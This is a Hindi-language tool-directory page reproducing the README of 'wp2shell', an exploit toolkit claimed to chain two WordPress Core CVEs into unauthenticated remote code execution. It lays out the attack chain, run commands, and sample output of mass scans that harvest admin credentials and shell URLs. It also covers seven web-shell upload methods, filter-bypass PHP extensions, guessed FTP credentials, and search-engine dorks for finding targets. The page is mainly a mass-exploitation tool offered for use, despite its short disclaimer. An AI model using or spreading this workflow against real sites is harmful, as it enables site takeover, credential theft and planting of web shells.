Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-63030 — WordPress Core Pre-Auth RCE — Batch Route Confusion + SQL Injection | Kitploit
उपकरण/GitHubGitHub/anggatechi/cve-2026-63030
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंग
GitHubanggatechi/cve-2026-63030

CVE-2026-63030

WordPress Core Pre-Auth RCE — Batch Route Confusion + SQL Injection

रिपॉजिटरी देखें
1131 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

wp2shell — वर्डप्रेस कोर प्री-ऑथ RCE

CVE-2026-63030 (बैच रूट कन्फ्यूज़न) + CVE-2026-60137 (SQL इंजेक्शन)

बिना किसी डिपेंडेंसी वाला शोषण टूलकिट, WordPress Core में wp2shell कमज़ोरियों की श्रृंखला के लिए। एक अकेला अनाम HTTP अनुरोध, बिना किसी प्लगइन की आवश्यकता के, एक डिफ़ॉल्ट WordPress इंस्टॉलेशन पर रिमोट कोड निष्पादन प्राप्त करता है।


📋 विषय-सूची

  • प्रभावित संस्करण
  • शोषण प्रवाह
  • त्वरित आरंभ
  • डेमो
  • विशेषताएँ
  • अपलोड विधियाँ
  • आउटपुट फ़ाइलें
  • डॉर्क / हंटिंग
  • संदर्भ
  • अस्वीकरण

🎯 प्रभावित संस्करण

रेंजप्रभावफिक्स वर्शन
7.0.0 – 7.0.1पूर्ण RCE7.0.2
6.9.0 – 6.9.4

किसी प्लगइन या विशेष कॉन्फ़िगरेशन की आवश्यकता नहीं है। एक बिना प्लगइन वाली WordPress इंस्टॉलेशन भी शोषण योग्य है।


🔗 शोषण प्रवाह

root@kitploit:~
┌─────────────────────────────────────┐
│  ANONYMOUS HTTP REQUEST             │
│  POST /?rest_route=/batch/v1        │
└────────────────┬────────────────────┘
                 │
┌────────────────▼────────────────────┐
│  CVE-2026-63030: Batch Desync       │
│  Malformed path → WP_Error →        │
│  Array misalignment → Auth Bypass   │
└────────────────┬────────────────────┘
                 │
┌────────────────▼────────────────────┐
│  CVE-2026-60137: SQL Injection      │
│  author__not_in → unsanitized →     │
│  UNION SELECT extraction            │
└────────────────┬────────────────────┘
                 │
     ┌───────────┼───────────┐
     │           │           │
┌────▼────┐ ┌───▼────┐ ┌───▼──────────┐
│ oEmbed  │ │ Blind  │ │ Changeset    │
│ Seeding │ │ SQLi   │ │ Re-entrancy  │
│ Write   │ │ Read   │ │ Escalation   │
│ Cache   │ │ IDs    │ │ → Admin User │
└────┬────┘ └───┬────┘ └───┬──────────┘
     │           │           │
     └───────────┼───────────┘
                 │
┌────────────────▼────────────────────┐
│  ADMIN CREATED (pre-auth!)          │
│  → Login → Upload Shell (7 methods) │
└─────────────────────────────────────┘

🚀 त्वरित आरंभ

root@kitploit:~
pip install requests
python exploit.py
root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  WP2SHELL — WordPress Core Pre-Auth RCE Exploit              ║
║  CVE-2026-63030 (Batch Route Confusion) + CVE-2026-60137    ║
║  Affected: WP 6.9.0 – 7.0.1  |  Fixed: 6.9.5 / 7.0.2       ║
╚══════════════════════════════════════════════════════════════╝

  [?] Target [url/list.txt] > list.txt
  [?] Threads [15] > 15

एकल टार्गेट

root@kitploit:~
python exploit.py
root@kitploit:~
  [?] Target [url/list.txt] > https://vulnerable-site.com

  ┌────────────────────────────────────────────────────────┐
  │                    SCAN CONFIGURATION                   │
  ├────────────────────────────────────────────────────────┤
  │  Targets : 1       Threads  : 1      Dir  : wp_core_rce│
  └────────────────────────────────────────────────────────┘

  ┌────────────────────────────────────────────────────────┐
  │  EXPLOIT SUCCESS                                       │
  ├────────────────────────────────────────────────────────┤
  │  Method : direct-plugin                                │
  │  Shell  : https://target.com/wp-content/plugins/...  │
  │  Login  : https://target.com/wp-login.php              │
  │  User   : wp2s_abc123def                               │
  │  Pass   : WP2S!xxxxxxxxxxxxxxxx                        │
  └────────────────────────────────────────────────────────┘

मास स्कैन

root@kitploit:~
python exploit.py
root@kitploit:~
┌────────────────────────────────────────────────────────┐
│                    SCAN CONFIGURATION                   │
├────────────────────────────────────────────────────────┤
│  Targets : 500    Threads  : 15     Dir  : wp_core_rce │
└────────────────────────────────────────────────────────┘
┌────────────┬────────────────────────────────────────┬──────────────┐
│            │                                        │              │
│  #/TOTAL   │ HOST                                   │ STATUS       │
├────────────┼────────────────────────────────────────┼──────────────┤
│    1/500   │ vulnerable-site.com                    │ SHELL        │
│            │   ↳ direct-plugin → https://vulnerabl...             │
│    2/500   │ target2.com                            │ ADM          │
│    3/500   │ safe-site.org                          │ SQLi         │
│    4/500   │ nope.com                               │ NO           │
│    5/500   │ jackpot.net                            │ SHELL        │
│            │   ↳ theme-editor → https://jackpot.ne...              │
└────────────┴────────────────────────────────────────┴──────────────┘
┌────────────────────────────────────────────────────────┐
│  SHELL     2   ADMIN    3   SQLi   15   TOTAL    50/500│
└────────────────────────────────────────────────────────┘
├────────────────────────────────────────────────────────┤
│  result.txt         │  admin credentials               │
│  result_upload.txt  │  shell upload URLs               │
│  log/scanned.txt    │  scanned hosts                   │
└────────────────────────────────────────────────────────┘

✨ विशेषताएँ

  • शून्य निर्भरता — केवल Python 3.11+ स्टैंडर्ड लाइब्रेरी (requests केवल expander के लिए)
  • मल्टी-थ्रेडेड — डिफ़ॉल्ट 15 थ्रेड, अधिकतम 30
  • ऑटो-रिज़्यूम — log/scanned.txt पहले से स्कैन किए गए टार्गेट्स को छोड़ देता है
  • साइलेंट बैच मोड — स्वच्छ तालिका आउटपुट, कोई लॉग स्पैम नहीं
  • ऑटो-डिटेक्शन — WordPress + batch API + SQLi उपलब्धता जाँच
  • 7 समानांतर अपलोड विधियाँ — फर्स्ट-विन रेस कंडीशन

📤 अपलोड विधियाँ

सभी 7 विधियाँ ThreadPoolExecutor के माध्यम से समानांतर रूप से निष्पादित होती हैं। पहली सफल विधि जीतती है और बाकी रद्द कर दी जाती हैं।

मीडिया अपलोड एक्सटेंशन: .phtml .php5 .php7 .php8 .pht .phar .shtml .php4 .phps .phtm .Php5 .PhP5 .pHtml .phP .PHP

आज़माए गए FTP क्रेडेंशियल: localhost / 127.0.0.1 के साथ root / www-data / WordPress एडमिन क्रेडेंशियल


📁 आउटपुट फ़ाइलें

फ़ाइलसामग्री
result.txtएडमिन क्रेडेंशियल: url.com/wp-login.php:user:pass
result_upload.txtशेल URLs: shell_url | login_url:user:pass | method

🔍 डॉर्क / हंटिंग

Shodan

root@kitploit:~
http.title:"WordPress"
http.component:"WordPress"

Fofa

root@kitploit:~
app="WordPress"
body="wp-json"
body="/batch/v1"

ZoomEye

root@kitploit:~
app:"WordPress"
"/wp-json/batch/v1"

Censys

root@kitploit:~
services.http.response.body:"/wp-json/batch/v1"

📚 संदर्भ

  • Searchlight Cyber एडवाइज़री
  • Hadrian तकनीकी ब्लॉग
  • WordPress 7.0.2 रिलीज़
  • Assetnote अनुसंधान
  • Wordfence थ्रेट इंटेल

⚠️ अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा अनुसंधान और पैठ परीक्षण के लिए प्रदान किया गया है। इसका उपयोग केवल उन सिस्टमों पर करें जिनके मालिक आप हैं या जिनके परीक्षण की आपके पास स्पष्ट लिखित अनुमति है। लेखक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।


📄 लाइसेंस

MIT लाइसेंस। विवरण के लिए LICENSE देखें।

टूल डाउनलोड करें
पूर्ण RCE
6.9.5
6.8.0 – 6.8.5केवल SQLi6.8.6
#विधिविवरण
1direct-plugin/wp-admin/plugin-install.php के माध्यम से zip अपलोड करें
2direct-theme/wp-admin/theme-install.php के माध्यम से zip अपलोड करें
3rest-apiauth कुकी के साथ /wp-json/wp/v2/plugins पर zip POST करें
4plugin-editor/wp-admin/plugin-editor.php के माध्यम से सीधे PHP लिखें
5theme-editorसक्रिय थीम निर्देशिका में PHP लिखें
6ftp-bypassजब WordPress FTP क्रेडेंशियल माँगे तो उन्हें सबमिट करें
7media-uploadमीडिया लाइब्रेरी के माध्यम से 15 एक्सटेंशन वेरिएंट के साथ PHP अपलोड करें
log/scanned.txt
सभी स्कैन किए गए होस्ट (पुनः चलाने पर ऑटो-स्किप)